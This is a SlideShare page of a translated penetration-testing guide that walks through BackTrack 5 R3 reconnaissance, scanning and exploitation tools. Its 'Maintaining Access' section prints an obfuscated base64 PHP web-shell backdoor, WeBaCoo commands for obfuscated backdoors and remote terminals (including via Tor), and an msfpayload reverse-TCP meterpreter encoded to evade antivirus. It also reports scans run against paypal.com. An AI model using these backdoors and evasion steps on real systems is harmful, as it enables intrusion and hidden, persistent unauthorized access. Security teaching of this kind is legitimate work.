SlideShare a Scribd company logo

Computer security

Mohamed Abdo, profile picture
Mohamed Abdo

This document provides an overview of various tools that can be used to analyze web applications for security vulnerabilities as part of a penetration test. It discusses tools for network mapping, information gathering, content management system identification, detecting intrusion detection/prevention systems, open source analysis, web crawling, vulnerability assessment and exploitation. Specific tools covered include Nmap, TheHarvester, Maltego, BlindElephant, CMS-Explorer, WhatWeb, Waffit, GHDB, Xssed, WebShag, DirBuster, JoomScan, SqlMap, Fimap, Shodan, W3af, Uniscan, Nikto. The document emphasizes that gathering information about the target is a key first step

Technology
1 of 22
Downloaded 124 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Computer Security Written by Caleb Bucker Pen-Tester – Ethical Hacker – Security Researcher http://calebbucker.blogspot.com/ http://www.twitter.com/CalebDrugs https://www.facebook.com/caleb.bucker mailto:calebbucker@gmail.com The Original Copy in Spanish Language http://www.sendspace.com/file/gyljvj                                 PENETRATION TESTING Web Analysis ‐ Vulnerability Assessment – Exploitation  Translated By   Mohamed Abdel Azim Mohamed   
Index    • INTRODUCTION • METHODS OF ANALYSIS OF WEB APPLICATIONS 1. NETWORK MAPPING • Nmap • Netifera 2. INFORMATION GATHERING • TheHarvester • Maltego 3. CMS IDENTIFICATION • BlindElephant • CMS-Explorer • WhatWeb 4. IDS/IPS DETECTION • Waffit 5. OPEN SOURCE ANALYSIS • GHDB (Google Hacking DataBase) • Xssed 6. WEB CRAWLERS • WebShag • DirBuster 7. VULNERABILITY ASSESSMENT AND EXPLOITATION • JoomScan • SqlMap • Fimap • Shodan • W3af • Uniscan • Nikto 8. MAINTAINING ACCESS • Weevely • WeBaCoo • MsfPayload 9. CONCLUSIÓN
INTRODUCTION Today, as many of us (Pen-tester's) we know that in these times the Analysis of Web Applications play a very important role in making a Safety Evaluation and / or Penetration Testing, as this gives us the appropriate information about web Application, such as the type of plugin you use, either types of Joomla CMS - WordPress or other. This will help us to determine what we should use Exploit, or see exactly how to exploit the vulnerabilities that can occur when performing penetration testing. Penetration Testing tests are also used to determine the level of security: a computer, a computer network LAN (Local Area Network) or WLAN (Wireless Local Area Network), among other Web applications, using identical simulated computer attacks those who conduct a Black Hat Hacker, or Cracker but without compromising the information or the availability of services, this is done in order to identify the potential threats in iT systems before the attacker discovers a (external or internal ). This process is also known as Ethical Hacking (Ethical Hacking). To perform this procedure Penetration Testing, BackTrack 5 R3 is used, a Linux distro based on Ubuntu perfectly made to carry out these tests, as it comes with a set of very important tools that do much to get all the necessary information about web applications, among others. BackTrack Wiki: http://www.backtrack-linux.org/wiki/ Descarga: http://www.backtrack-linux.org/downloads/
METHODS OF ANALYSIS OF WEB APPLICATIONS: 1. NETWORK MAPPING: Network Mapping is the study of the physical network connectivity. Mapping Internet is the study of the physical connectivity of the Internet. Network Mapping is often determine the servers and operating systems running on the network. The law and ethics of port scans are complex. An analysis of the network can be detected by humans or automated systems, and is treated as a malicious act. In the BackTrack suite includes NMAP, a tool that we all know for its power and effectiveness in performing their work, which is very useful to us to carry out this method so important in a Web Audit. • NMAP: Nmap ("Network Mapper") is an open source tool for network exploration and security auditing. Nmap uses IP packets "raw" ("raw", NT) in original ways to determine what hosts are available on a network, what services (name and version of the application) offering, what operating systems (and their versions) running, what type of packet filters or firewalls are in use, and dozens of other characteristics. Use: nmap www.sitio-web.com nmap 192.168.1.1
• NETIFERA: Netifera is a network scanner can scan passive (analyzing a pcap file, network sniffing lives) and assets of analysis (analysis of port entity). Identifies the network hosts. This project offers many advantages for security developers and researchers who want to implement new tools as well as the community of users of these tools. This tool is included in BackTrack and is located at the following address: Applications - BackTrack - Information Gathering - Network Analysis - Identify Live Hosts – Netifera The usage is very easy, just have to put the web address where it says: ... Type Address enter pressed and we will come out with the target website's and IP's to which will audit.: In this case I placed the website: www.paypal.com in which I made Reverse lookup, TCP Connect Scan UDP Scan, Crawler, NS Lookup, Brute Force Host Name
2. INFORMATION GATHERING The first phase of safety assessment focuses on gathering information as much as possible about a web application. Gathering information is the most critical step of a test web application security. This task can be accomplished in many different ways, using public tools (search engine) scanner, simple sending HTTP requests or requests specially designed, it is possible to apply force to the filter information, for example, the disclosure error message or versions and technologies used. There are basically two types of data collection: active and passive. Passive information gathering is that attackers will not communicate directly with the target and are trying to gather information that is available on the Internet, while in the active collection of information, the attacker will be in direct contact with the object and will be trying to gather information. • THEHARVESTER: The Harvester is a tool to collect email accounts, user names and host names or sub domains from different public sources such as search engines and PGP key servers. Use: /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 500 -b google /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -b pgp /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 200 -b linkedin • MALTEGO: Maltego is a tool that is based on the application information and forensic and shows how information is connected to each other. With Maltego, we can find relationships that people mostly use today, including your social profile (Facebook - Twitter), mutual friends, businesses that relate to the information gathered, and websites. If we collect information regarding any infrastructure, we can gather relationship between domains and DNS names. Location: Applications - Backtrack - Information Gathering - Network Analysis - DNS Analysis – Maltego
ARCHITECTURE OF MALTEGO EXAMPLE
3. CMS IDENTIFICATION • BLINDELEPHANT: BlindElephant is a python based tool that is used for Web Application Fingerprinting. The tool is quick, has low bandwidth and is highly automated. Use /pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://sitio-web.com/ cms • CMS-EXPLORER: Fingerprinting serves for web applications, can also be used to identify the type of CMS used, therefore, the attack is done according to the obtained information. Use: /pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://sitio-web.com/ -type cms
• WHATWEB: It is another tool used to identify the type of content management systems (CMS), blogging platform, statistics, and servers used Javascript libraries.Has 900 Plugins for web analytics purposes. Use: /pentest/enumeration/web/whatweb# ./whatweb http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb -v http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb -a 3 http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb 192.168.1.1/24 4. IDS/IPS DETECTION During the realization of a VA / PT in a domain, the possibility exists that the IDS-IPS services are installed, this can sometimes stop several types of attacks that are made in the domain. A lot of WAF (Web Application Firewall) are sold to companies as a successful technique for mitigating vulnerabilities in Web applications. Luckily, WAF is easy to detect, because most of these use signature-based detection methods, therefore, the attacker can try to encode parameters and try bypassear attack the WAF. In the BackTrack suite includes a useful tool for the detection of IDS-IPS, which is Waffit. • WAFFIT: It is a tool that detects possible Firewall you may have a web server, it is of little use, since detecting the firewall behind the domain is a very important step in the process of penetration testing. Use: /pentest/web/waffit# ./wafw00f.py http://sitio-web.com/
Computer security
5. OPEN SOURCE ANALYSIS Open-Source Analysis is performed using tools like GHDB, revhosts and XSSed. The GHDB (Google Hack Data Base) and XSSed are linked to websites, while rev hosts is a console tool. • GHDB: Google Hacking Database, the exploit-db team maintains a database for Google Dork's that can greatly help in Pen-tester's information gathering. We can use the dork's to find certain types of vulnerable servers or other information. For example, a Google dork like "Microsoft-IIS/6.0" intitle: index.of "can be used to detect servers running on Microsoft IIS 6.0. • XSSED: http://www.xssed.com/ a website that contains a list of websites vulnerable to Cross Site Scripting (XSS), by various authors. It can be opened from: Applications - Backtrack - Information Gathering - Web Application Analysis - Open Source Analysis - Xssed. 6. WEB CRAWLERS In this last category of Web Analysis, famous Crawlers are used, this will help much to list the files and folders "hidden" inside a web server. The BackTrack suite has many tools to perform this type of analysis such as the DIRB, Golismero, SQLScan, Deblaze and WebShag. • WEBSHAG: Webshag is a tool programmed in Python, which combines the features useful for Auditing Web Servers as web crawling, URL scanning or file fuzzing. Webshag can be used to analyze a web server in HTTP or HTTPS, through a proxy and using HTTP authentication (Basic and Digest).
Besides innovative features proposed IDS evasion, intended that the correlation between the application more complicated (for example, using a random sample for each proxy server HTTP request). It can be opened from Applications - BackTrack - Information Gathering - Web Application Analysis - Web Crawlers - WebShag Gui. • DIRBUSTER: DirBuster is a Java application designed to make Brute Force in the directories and files in web server / application. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within it, then try to find these DirBuster. DirBuster is a total of 9 different lists, this makes DirBuster extremely effective in finding hidden files and directories. And if that was not enough DirBuster also has the option of making a pure Brute Force. It can be found at the following location: Applications - BackTrack - Vulnerabylity Assessment - Web Application Assessment - Web Application Fuzzers – DirBuster
Computer security
7. VULNERABILITY ASSESSMENT AND EXPLOITATION The stage of vulnerability assessment is where you can explore our goal for errors, but before a vulnerability assessment, gathering information about the target is much more useful. The information gathering phase remains the key step before further attacks, simply because it makes the job easier, for example, in the first stage in the use of scanners to identify the CMS as BlindElephant, was scanned and found the version of the installed application. Now, at the stage of vulnerability assessment, you can use many tools (scanners) that will help a lot to find vulnerabilities in respective specific web server. • JOOMSCAN: It is a Perl-based tool that is used to identify known vulnerabilities such as SQL Injection, XSS or other, on web servers based on the Joomla platform. • Detects the version of Joomla! is running. • Scan and locate known vulnerabilities in Joomla! and its extensions. • It reports in text or HTML format. • Allow immediate updating via a scanner or svn. • type Detects vulnerabilities: SQL injection, LFI, RFI, XSS and others. It can be opened from /pentest/web/joomscan# ./joomscan.pl -u www.sitio-web.com • SQLMAP: It is a tool that helps automate the process of detecting and exploiting SQL injection vulnerabilities allowing full access to the database of Web servers. It can be opened from /pentest/database/sqlmap# ./sqlmap.py -u http://www.sitio-web.com/ --dbs
• FIMAP: It is a small tool programmed in python which can find, prepare, audit and automatically exploiting Remote File Inclusion errors in web applications. Is currently under development, but it is usable. The objective is to improve the quality Fimap and security of your website. It can be opened from /pentest/web/fimap# ./fimap.py -u http://localhost/test.php?file=bang&id=23 /pentest/web/fimap# ./fimap.py -g -q 'noticias.php?id='
• SHODAN: This is another site evaluation tool, particular utility for pentesters. It can be used to collect a series of intelligent information about devices that are connected to the Internet. We can, for example, look to see if all network devices such as routers, VoIP, printers, cameras, etc., are in place. To find if a service is running in the domain, the syntax would be: • hostname: port target.com: 80,21,22 If we simply want to know the results on the host name, simply, the syntax would be: • hostname: target.com • W3AF: Audit is a tool for web applications security, is basically divided into several modules such as Attack, Audit, Exploit, Discovery, and Brute Force Evasion, which can all be used accordingly. These modules come with several modules w3af side, for example, we can select the module XSS Audit assuming it is necessary to perform a particular audit. It can be opened from Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - w3af
Once the analysis is complete, w3af shows detailed information about the vulnerabilities found in the specified website, which can compromise accordingly for further exploitation.
• UNISCAN: A Web Vulnerability Scanner, led to computer security, aimed at finding vulnerabilities in web systems. It is licensed under GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3). Uniscan is developed in Perl, has easy handling of regular expressions and is also multi-threaded. Features: • identification system pages via a web crawler. • Proof of pages found through the GET method. • Test the forms found by the POST method. • Support for SSL requests (HTTPS). • Supports Proxy. • Generate list of sites via Google. • Generate list of sites with Bing. • Client GUI written using perl tk. It can be downloaded from the following link: http://uniscan.sourceforge.net/?page_id=7 it can be opened from ./uniscan.pl -u http://www.sitio-web.com/ -qweds • NIKTO: It is a web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 files / CGIs potentially dangerous controls outdated versions of over 1250
servers, and version specific problems on over 270 servers. It also checks the server configuration elements, such as the presence of multiple index files and HTTP server options. Nikto is a robust project that has been several years in development and is constantly evolving. Some of the most interesting features of this tool include the ability to generate reports in various formats, integration with LibWhisker (Anti-IDS), integration with Metasploit, among others. it can be opened from Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - Nikto Use: /pentest/web/nikto# ./nikto.pl -host www.sitio-web.com 8. MAITAINING ACCESS Once you access the website (goal), we need to maintain access for future use, because we will not be starting from scratch again and again. To avoid this, we can load the shell backdoors's web or the web page. The coding of the tailgate is also important, as not to create "noise" when loaded on the server. If so, then administrators can easily detect and remove the rear doors. In BackTrack 5 R3 suite incorporates good tools to carry out this process, which are: • WEEVELY: It is an essential tool for the further exploitation of web applications, and can be used as a back door or a web shell to manage web accounts. Weevely search functions like system (), passthru (), popen (), exec (), proc_open (), shell_exec (), pcntl_exec (), perl-> system (), python_eval ()) using activated functions in a server remote. The following code is an example of the code of the backdoor created by Weevely. -------------------------------------------------------------------------------------------------------------------
eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=')); ------------------------------------------------------------------------------------------------------------------- It can be opened from Applications - BackTrack - Maintaining Access - Web BackDoors - Weevely Use: /pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php /pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-web.com/back.php password • WEBACOO: WeBaCoo (Web Backdoor Cookie) is a backdoor that provides a terminal connection over HTTP between client and web server. It is an exploitation tool to maintain access to a web server (hacked). It was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving stealth mechanism to execute commands on the compromised server. File obfuscated performs communication via HTTP header's Cookie validating HTTP requests and responses from the web server. WeBaCoo provides a way to generate the code to create the PHP backdoor using predefined payloads. It also offers the "terminal" mode in which the user can establish a remote connection to the server and execute commands with privileges of the web service desired. The download is available from Github: https://github.com/anestisb/WeBaCoo Options: 1) Create obfuscated backdoor 'backdoor.php' with default settings: •. / Webacoo.pl-g-o backdoor.php 2) Create 'raw-backdoor.php' backdoor de-obfuscated using the work "transit": •. / webacoo.pl-g-o raw-backdoor.php-f 4-r 3) Set "terminal" connection to the remote host using the default settings: •. / webacoo.pl-t-u http://127.0. 0.1/backdoor.php 4) Set "terminal" connection to the remote host to configure some arguments: •. / webacoo.pl-t-u-c http://127.0.0.1/backdoor.php "Test-Cookie" - d "TTT"
5) Set "terminal" connection to the remote host via HTTP proxy: •. / webacoo.pl-t-u-p 127.0.0.1:8080 http://10.0.1.13/backdoor.php 6 ) Set "terminal" connection to the remote host via HTTP proxy with basic authentication: •. / webacoo.pl-t-u-p http://10.0.1.13/backdoor.php user: password: 10.0.1.8: 3128 7) Set "terminal" connection to the remote host via Tor and record activity: •. / webacoo.pl-t-u-p http://example.com/backdoor.php tor-l webacoo_log.txt • MSFPAYLOAD: Metasploit can be used to create backdoors that can then be used to maintain access to the web server. This can be done with the help of msfpayload. The steps to create backdoor msfpayload are as follows: We have to select the Payload that we will use to get a Meterpreter shell generated through a reverse TCP connection. The command would be: msfpayload windows/meterpreter/reverse_tcp This Payload has two parameters: lhost (our IP) and LPORT to select the port that we will use. The "R" is used for the output file in RAW data format so that we can then encode. msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R This command will create the payload, but it has to be coded to avoid antivirus detection for that matter can be done using the msfencode option to do this, we need to use pipe ("|") windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> bucker.exe -e is used to specify the encoding necessary in this case I'm using the encoding shikata_ga_nai and-t for the type of file extension (exe). For example, if we want to see the list of available encoders MSF, use the following command: msfpayload windows/meterpreter/reverse_tcp -l
9. CONCLUSION These are only a few methods you can follow to make the exploitation of vulnerabilities in a web application. Once we have the information about our goal, try to perform a vulnerability assessment in order to obtain information about the exploits that can be used. Once done, exploit vulnerabilities and, if necessary, load a backdoor, but before that, you must encode the backdoor to avoid detection. I hope this will help you find the vulnerability, exploitation and how to maintain access to your target. My Greeting. References: http://en.wikipedia.org/wiki/Penetration_test http://www.giac.org/certification/web-application-penetration-tester-gwapt http://www.offensive-security.com/information-security-training/penetration-testing-with-backtrack/ https://www.owasp.org/index.php/Web_Application_Penetration_Testing

More Related Content

PDF
What is a Hacker (part 2): How data is stolen
Klaus Drosch
 
PPTX
Communication security 2021
MuhammadusmanRana10
 
PPTX
What is hacking
MuhammadUmer411
 
PPT
101 Internet Security Tips Slideshow - Know How To Protect Your Computer Online!
EMBplc.com
 
PPT
Network Security
VIKAS SINGH BHADOURIA
 
PPTX
Spyware risk it's time to get smart
Kanha Sahu
 
PPTX
Internet Security in Web 2.0
Arjunsinh Sindhav
 
DOCX
Hacking
gvsai501
 
What is a Hacker (part 2): How data is stolen
Klaus Drosch
 
Communication security 2021
MuhammadusmanRana10
 
What is hacking
MuhammadUmer411
 
101 Internet Security Tips Slideshow - Know How To Protect Your Computer Online!
EMBplc.com
 
Network Security
VIKAS SINGH BHADOURIA
 
Spyware risk it's time to get smart
Kanha Sahu
 
Internet Security in Web 2.0
Arjunsinh Sindhav
 
Hacking
gvsai501
 

What's hot (19)

PDF
Brute Force Attack
Ahmad karawash
 
PPTX
Information on Brute Force Attack
HTS Hosting
 
PPTX
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault
 
PPTX
Ethical Hacking & Penetration Testing
ecmee
 
PPTX
Penetration Testing
Mayank Singh
 
PPTX
Security Attack Analysis for Finding and Stopping Network Attacks
Savvius, Inc
 
PPTX
Cybersecurity Cyber Usalama
MuhammadRadwan10
 
PPTX
Network security - Defense in Depth
Dilum Bandara
 
PPTX
Final project.ppt
shreyng
 
PPTX
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?
Storage Switzerland
 
PDF
Domain 4 of CEH V11: Network and Perimeter Hacking
ShivamSharma909
 
PDF
Domain 5 of the CEH: Web Application Hacking
ShivamSharma909
 
PPT
XSS filter on Server side
cuteboysmith
 
PDF
What is Ransomware?
Datto
 
PPTX
Document from Sidra Saghir Asim.pptx
sidrasagheer1
 
DOCX
Pegasus
danjspaul
 
PPTX
Ethical hacking
Manish Mudhliyar
 
PPTX
Computer Networks 4
Mr Smith
 
PPTX
Cyber crime trends in 2013
The eCore Group
 
Brute Force Attack
Ahmad karawash
 
Information on Brute Force Attack
HTS Hosting
 
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault
 
Ethical Hacking & Penetration Testing
ecmee
 
Penetration Testing
Mayank Singh
 
Security Attack Analysis for Finding and Stopping Network Attacks
Savvius, Inc
 
Cybersecurity Cyber Usalama
MuhammadRadwan10
 
Network security - Defense in Depth
Dilum Bandara
 
Final project.ppt
shreyng
 
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?
Storage Switzerland
 
Domain 4 of CEH V11: Network and Perimeter Hacking
ShivamSharma909
 
Domain 5 of the CEH: Web Application Hacking
ShivamSharma909
 
XSS filter on Server side
cuteboysmith
 
What is Ransomware?
Datto
 
Document from Sidra Saghir Asim.pptx
sidrasagheer1
 
Pegasus
danjspaul
 
Ethical hacking
Manish Mudhliyar
 
Computer Networks 4
Mr Smith
 
Cyber crime trends in 2013
The eCore Group
 
Ad

Viewers also liked (8)

DOCX
Backtrack Manual Part9
Nutan Kumar Panda
 
PDF
How To Build The Perfect Backtrack 4 Usb Drive
kriggins
 
PPTX
BackTrack 4 R2 - SFISSA Presentation
Jorge Orchilles
 
DOCX
Backtrack manual Part1
Nutan Kumar Panda
 
DOCX
Backtrack Manual Part10
Nutan Kumar Panda
 
DOCX
Backtrack Manual Part2
Nutan Kumar Panda
 
PPT
Backtrack os 5
Ayush Goyal
 
PPTX
Backtrack
One97 Communications Limited
 
Backtrack Manual Part9
Nutan Kumar Panda
 
How To Build The Perfect Backtrack 4 Usb Drive
kriggins
 
BackTrack 4 R2 - SFISSA Presentation
Jorge Orchilles
 
Backtrack manual Part1
Nutan Kumar Panda
 
Backtrack Manual Part10
Nutan Kumar Panda
 
Backtrack Manual Part2
Nutan Kumar Panda
 
Backtrack os 5
Ayush Goyal
 
Backtrack
One97 Communications Limited
 
Ad

Similar to Computer security (20)

PPTX
Phases of penetration testing
Abdul Rahman
 
PDF
IT Vulnerability & Tools Watch 2011
WASecurity
 
DOCX
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri
 
PDF
The Web Application Hackers Toolchain
jasonhaddix
 
PPTX
DC612 Day - Hands on Penetration Testing 101
dc612
 
PDF
Wm4
Umang Patel
 
PDF
Wm4
Umang Patel
 
PDF
ethical Hack
Viggi Unbeaten
 
PPT
Nomura UCCSC 2009
dnomura
 
PDF
International Journal of Engineering Inventions (IJEI)
International Journal of Engineering Inventions www.ijeijournal.com
 
PDF
Owasp modern information gathering
KZA
 
PPTX
Web hacking 1.0
Q Fadlan
 
PDF
Gates Toorcon X New School Information Gathering
Chris Gates
 
PDF
Web app penetration testing best methods tools used
Zoe Gilbert
 
PDF
Osint ashish mistry
n|u - The Open Security Community
 
PPTX
Introduction to penetration testing
Nezar Alazzabi
 
PPTX
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
Kenneth Kwon
 
PPTX
( Ethical hacking tools ) Information grathring
Gouasmia Zakaria
 
PPTX
Dafgjgghhghfhjgghjhgy06-Footprinting.pptx
AlfredObia1
 
PPT
Ethical hacking
Sourabh Badve
 
Phases of penetration testing
Abdul Rahman
 
IT Vulnerability & Tools Watch 2011
WASecurity
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri
 
The Web Application Hackers Toolchain
jasonhaddix
 
DC612 Day - Hands on Penetration Testing 101
dc612
 
Wm4
Umang Patel
 
Wm4
Umang Patel
 
ethical Hack
Viggi Unbeaten
 
Nomura UCCSC 2009
dnomura
 
International Journal of Engineering Inventions (IJEI)
International Journal of Engineering Inventions www.ijeijournal.com
 
Owasp modern information gathering
KZA
 
Web hacking 1.0
Q Fadlan
 
Gates Toorcon X New School Information Gathering
Chris Gates
 
Web app penetration testing best methods tools used
Zoe Gilbert
 
Osint ashish mistry
n|u - The Open Security Community
 
Introduction to penetration testing
Nezar Alazzabi
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
Kenneth Kwon
 
( Ethical hacking tools ) Information grathring
Gouasmia Zakaria
 
Dafgjgghhghfhjgghjhgy06-Footprinting.pptx
AlfredObia1
 
Ethical hacking
Sourabh Badve
 

Recently uploaded (20)

PDF
Web App vs Mobile App What Should You Build First.pdf
KodekX
 
PDF
STKI Israel Market Study 2025 version august
Dr. Jimmy Schwarzkopf
 
PDF
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
Microsoft Dynamics
 
PDF
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
PDF
Getting started with AI Agents and Multi-Agent Systems
Maxim Salnikov
 
PDF
A contest of sentiment analysis: k-nearest neighbor versus neural network
IAESIJAI
 
PDF
1 - Historical Antecedents, Social Consideration.pdf
tuazon2030627
 
PDF
A novel scalable deep ensemble learning framework for big data classification...
IAESIJAI
 
PDF
Architecture types and enterprise applications.pdf
ChristopherTHyatt
 
PDF
project resource management chapter-09.pdf
ssuser00e6e21
 
PDF
ENT215_Completing-a-large-scale-migration-and-modernization-with-AWS.pdf
ssuser28425f
 
PDF
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
PPTX
Chapter 5: Probability Theory and Statistics
RandyFin
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PPTX
Final SEM Unit 1 for mit wpu at pune .pptx
anishtilekar08
 
PPTX
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
PPTX
Modernising the Digital Integration Hub
Daniel Toomey
 
PDF
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
IAESIJAI
 
PDF
Enhancing emotion recognition model for a student engagement use case through...
IAESIJAI
 
PDF
NewMind AI Weekly Chronicles – August ’25 Week III
NewMind AI
 
Web App vs Mobile App What Should You Build First.pdf
KodekX
 
STKI Israel Market Study 2025 version august
Dr. Jimmy Schwarzkopf
 
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
Microsoft Dynamics
 
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
Getting started with AI Agents and Multi-Agent Systems
Maxim Salnikov
 
A contest of sentiment analysis: k-nearest neighbor versus neural network
IAESIJAI
 
1 - Historical Antecedents, Social Consideration.pdf
tuazon2030627
 
A novel scalable deep ensemble learning framework for big data classification...
IAESIJAI
 
Architecture types and enterprise applications.pdf
ChristopherTHyatt
 
project resource management chapter-09.pdf
ssuser00e6e21
 
ENT215_Completing-a-large-scale-migration-and-modernization-with-AWS.pdf
ssuser28425f
 
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
Chapter 5: Probability Theory and Statistics
RandyFin
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
Final SEM Unit 1 for mit wpu at pune .pptx
anishtilekar08
 
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
Modernising the Digital Integration Hub
Daniel Toomey
 
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
IAESIJAI
 
Enhancing emotion recognition model for a student engagement use case through...
IAESIJAI
 
NewMind AI Weekly Chronicles – August ’25 Week III
NewMind AI
 

Computer security

  • 1. Computer Security Written by Caleb Bucker Pen-Tester – Ethical Hacker – Security Researcher http://calebbucker.blogspot.com/ http://www.twitter.com/CalebDrugs https://www.facebook.com/caleb.bucker mailto:calebbucker@gmail.com The Original Copy in Spanish Language http://www.sendspace.com/file/gyljvj                                 PENETRATION TESTING Web Analysis ‐ Vulnerability Assessment – Exploitation  Translated By   Mohamed Abdel Azim Mohamed   
  • 2. Index    • INTRODUCTION • METHODS OF ANALYSIS OF WEB APPLICATIONS 1. NETWORK MAPPING • Nmap • Netifera 2. INFORMATION GATHERING • TheHarvester • Maltego 3. CMS IDENTIFICATION • BlindElephant • CMS-Explorer • WhatWeb 4. IDS/IPS DETECTION • Waffit 5. OPEN SOURCE ANALYSIS • GHDB (Google Hacking DataBase) • Xssed 6. WEB CRAWLERS • WebShag • DirBuster 7. VULNERABILITY ASSESSMENT AND EXPLOITATION • JoomScan • SqlMap • Fimap • Shodan • W3af • Uniscan • Nikto 8. MAINTAINING ACCESS • Weevely • WeBaCoo • MsfPayload 9. CONCLUSIÓN
  • 3. INTRODUCTION Today, as many of us (Pen-tester's) we know that in these times the Analysis of Web Applications play a very important role in making a Safety Evaluation and / or Penetration Testing, as this gives us the appropriate information about web Application, such as the type of plugin you use, either types of Joomla CMS - WordPress or other. This will help us to determine what we should use Exploit, or see exactly how to exploit the vulnerabilities that can occur when performing penetration testing. Penetration Testing tests are also used to determine the level of security: a computer, a computer network LAN (Local Area Network) or WLAN (Wireless Local Area Network), among other Web applications, using identical simulated computer attacks those who conduct a Black Hat Hacker, or Cracker but without compromising the information or the availability of services, this is done in order to identify the potential threats in iT systems before the attacker discovers a (external or internal ). This process is also known as Ethical Hacking (Ethical Hacking). To perform this procedure Penetration Testing, BackTrack 5 R3 is used, a Linux distro based on Ubuntu perfectly made to carry out these tests, as it comes with a set of very important tools that do much to get all the necessary information about web applications, among others. BackTrack Wiki: http://www.backtrack-linux.org/wiki/ Descarga: http://www.backtrack-linux.org/downloads/
  • 4. METHODS OF ANALYSIS OF WEB APPLICATIONS: 1. NETWORK MAPPING: Network Mapping is the study of the physical network connectivity. Mapping Internet is the study of the physical connectivity of the Internet. Network Mapping is often determine the servers and operating systems running on the network. The law and ethics of port scans are complex. An analysis of the network can be detected by humans or automated systems, and is treated as a malicious act. In the BackTrack suite includes NMAP, a tool that we all know for its power and effectiveness in performing their work, which is very useful to us to carry out this method so important in a Web Audit. • NMAP: Nmap ("Network Mapper") is an open source tool for network exploration and security auditing. Nmap uses IP packets "raw" ("raw", NT) in original ways to determine what hosts are available on a network, what services (name and version of the application) offering, what operating systems (and their versions) running, what type of packet filters or firewalls are in use, and dozens of other characteristics. Use: nmap www.sitio-web.com nmap 192.168.1.1
  • 5. NETIFERA: Netifera is a network scanner can scan passive (analyzing a pcap file, network sniffing lives) and assets of analysis (analysis of port entity). Identifies the network hosts. This project offers many advantages for security developers and researchers who want to implement new tools as well as the community of users of these tools. This tool is included in BackTrack and is located at the following address: Applications - BackTrack - Information Gathering - Network Analysis - Identify Live Hosts – Netifera The usage is very easy, just have to put the web address where it says: ... Type Address enter pressed and we will come out with the target website's and IP's to which will audit.: In this case I placed the website: www.paypal.com in which I made Reverse lookup, TCP Connect Scan UDP Scan, Crawler, NS Lookup, Brute Force Host Name
  • 6. 2. INFORMATION GATHERING The first phase of safety assessment focuses on gathering information as much as possible about a web application. Gathering information is the most critical step of a test web application security. This task can be accomplished in many different ways, using public tools (search engine) scanner, simple sending HTTP requests or requests specially designed, it is possible to apply force to the filter information, for example, the disclosure error message or versions and technologies used. There are basically two types of data collection: active and passive. Passive information gathering is that attackers will not communicate directly with the target and are trying to gather information that is available on the Internet, while in the active collection of information, the attacker will be in direct contact with the object and will be trying to gather information. • THEHARVESTER: The Harvester is a tool to collect email accounts, user names and host names or sub domains from different public sources such as search engines and PGP key servers. Use: /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 500 -b google 